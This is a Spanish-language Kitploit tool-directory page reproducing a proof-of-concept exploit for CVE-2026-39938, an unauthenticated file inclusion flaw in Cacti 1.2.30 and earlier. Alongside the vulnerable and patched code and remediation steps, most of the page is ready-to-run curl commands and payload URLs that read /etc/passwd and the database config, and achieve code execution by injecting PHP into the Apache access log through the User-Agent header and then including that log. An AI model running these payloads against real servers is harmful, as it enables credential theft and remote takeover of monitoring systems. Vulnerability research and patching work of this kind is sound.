Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/polosss/by-poloss..-..cve-2026-39938
ReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubpolosss/by-poloss..-..cve-2026-39938

By-Poloss..-..CVE-2026-39938

Exploit de prueba de concepto para CVE-2026-39938: inclusión de archivos local no autenticada en Cacti <= 1.2.30, que permite lectura arbitraria de archivos y ejecución remota de código mediante envenenamiento de registros.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
By-Poloss..-..CVE-2026-39938 — Exploit de prueba de concepto para CVE-2026-39938: inclusión de archivos local no autenticada en Cacti <= 1.2.30, que permite lectura arbitraria de archivos y ejecución remota de código mediante envenenamiento de registros. | Kitploit
Ver Repositorio
hace 1 mesAún no revisado

CVE-2026-39938: Cacti <= 1.2.30 - LFI no autenticado

Resumen Ejecutivo

CampoValor
ID CVECVE-2026-39938
Puntuación CVSS9.8 (Crítico)
Producto afectadoCacti
Versiones afectadas<= 1.2.30
Versión parcheada1.2.31
Commit de corrección9871f0c

Detalles de la Vulnerabilidad

Causa Raíz

La vulnerabilidad existe en lib/rrd.php donde el parámetro graph_theme se usa directamente sin sanitización:

CÓDIGO VULNERABLE:

root@kitploit:~
if (isset($graph_data_array['graph_theme'])) {
    $rrdtheme = $config['base_path'] . '/include/themes/' . $graph_data_array['graph_theme'] . '/rrdtheme.php';
}

CÓDIGO PARCHADO:

root@kitploit:~
if (isset($graph_data_array['graph_theme'])) {
    $theme = basename($graph_data_array['graph_theme']);
    if ($theme === '' || $theme === '.' || $theme === '..') {
        $theme = get_selected_theme();
    }
    $rrdtheme = $config['base_path'] . '/include/themes/' . $theme . '/rrdtheme.php';
}

El problema: No hay validación contra secuencias de path traversal ../, permitiendo a atacantes leer archivos arbitrarios sin autenticación.


Prueba de Concepto (PoC) - Pasos Sencillos

Paso 1: Verificar la Vulnerabilidad - Leer /etc/passwd

root@kitploit:~
curl -k -s "http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../etc/passwd"

Resultado: El contenido de /etc/passwd se mostrará en la respuesta.

Paso 2: Leer la Configuración de la Base de Datos

root@kitploit:~
curl -k -s "http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../include/config.php"

Resultado: Las credenciales de la base de datos (usuario, contraseña) quedarán expuestas.

Paso 3: Ejecución Remota de Código mediante Envenenamiento de Logs

3.1 Inyectar Código PHP en el Log de Apache

root@kitploit:~
curl -k -s "http://target-cacti/graph_image.php?local_graph_id=1" \
  -H "User-Agent: <?php system('id'); ?>"

3.2 Ejecutar el Código Incluyendo el Archivo de Log

root@kitploit:~
curl -k -s "http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../var/log/apache2/access.log"

Resultado: La salida del comando (por ejemplo, uid=33(www-data)) se mostrará.


Puntos Finales Comunes Probados


Ejemplos de URL PoC

Prueba LFI Básica

root@kitploit:~
http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../etc/passwd

Leer Configuración de la Aplicación

root@kitploit:~
http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../include/config.php

Envenenamiento de Logs (Inyección)

root@kitploit:~
http://target-cacti/graph_image.php?local_graph_id=1

Con la cabecera: User-Agent: <?php system('id'); ?>

Envenenamiento de Logs (Ejecución)

root@kitploit:~
http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../var/log/apache2/access.log

Remediación

Actualizar a la Versión Parcheada

root@kitploit:~
cd /var/www/html/cacti
git fetch --tags
git checkout tags/release/1.2.31

Verificar que el Parche se Aplicó

root@kitploit:~
grep -A 5 "if (isset(\$graph_data_array\['graph_theme'\]))" lib/rrd.php | grep basename

Mitigación Temporal (.htaccess)

root@kitploit:~
RewriteCond %{QUERY_STRING} (^|&)graph_theme=\.\./ [NC]
RewriteRule ^graph_image\.php$ - [F,L]

Referencias

  • Aviso de Seguridad de GitHub
  • Commit de Corrección 9871f0c
  • NVD CVE-2026-39938

W.P.E.F

  • Canal de Telegram W.P.E.F #1
  • Canal de Telegram W.P.E.F #2

Informe generado con fines de investigación en seguridad Fecha: 27 de junio de 2026

Descargar herramienta
Punto FinalParámetroEjemplo de Payload
/graph_image.phpgraph_theme../../../../../../../etc/passwd
/graph_image.phpgraph_theme../../../../include/config.php
/graph_image.phpgraph_theme../../../../../../../var/log/apache2/access.log